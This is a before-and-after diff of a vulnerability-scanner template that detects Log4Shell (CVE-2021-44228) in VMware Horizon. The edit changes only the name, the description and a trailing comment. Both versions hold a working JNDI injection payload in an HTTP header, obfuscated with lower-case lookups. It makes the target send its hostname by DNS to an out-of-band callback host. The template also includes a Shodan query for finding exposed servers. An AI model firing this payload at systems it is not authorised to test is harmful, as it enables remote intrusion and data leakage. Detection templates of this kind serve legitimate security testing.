vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml (before)
id: vmware-horizon-log4j-jndi-rce

info:
  name: VMware Horizon Log4j JNDI RCE
  author: johnk3r
  severity: critical
  description: |
    A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon.
  reference:
    - https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
    - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  metadata:
    verified: true
    shodan-query: http.html:"VMware Horizon"
  tags: cve,cve2021,rce,jndi,log4j,horizon,vmware,oast

requests:
  - raw:
      - |
        GET /portal/info.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml (after)
id: vmware-horizon-log4j-jndi-rce

info:
  name: VMware Horizon Log4j -  Remote Code Execution
  author: johnk3r
  severity: critical
  description: |
    VMware Horizon is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
    - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
  metadata:
    verified: true
    shodan-query: http.html:"VMware Horizon"
  tags: cve,cve2021,rce,jndi,log4j,horizon,vmware,oast

requests:
  - raw:
      - |
        GET /portal/info.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

# Enhanced by md on 2022/10/06

vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml (diff)
@@ -1,11 +1,11 @@
 id: vmware-horizon-log4j-jndi-rce
 
 info:
-  name: VMware Horizon Log4j JNDI RCE
+  name: VMware Horizon Log4j -  Remote Code Execution
   author: johnk3r
   severity: critical
   description: |
-    A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon.
+    VMware Horizon is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
   reference:
     - https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis
     - https://www.vmware.com/security/advisories/VMSA-2021-0028.html
@@ -41,3 +41,5 @@ requests:
         group: 1
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+
+# Enhanced by md on 2022/10/06
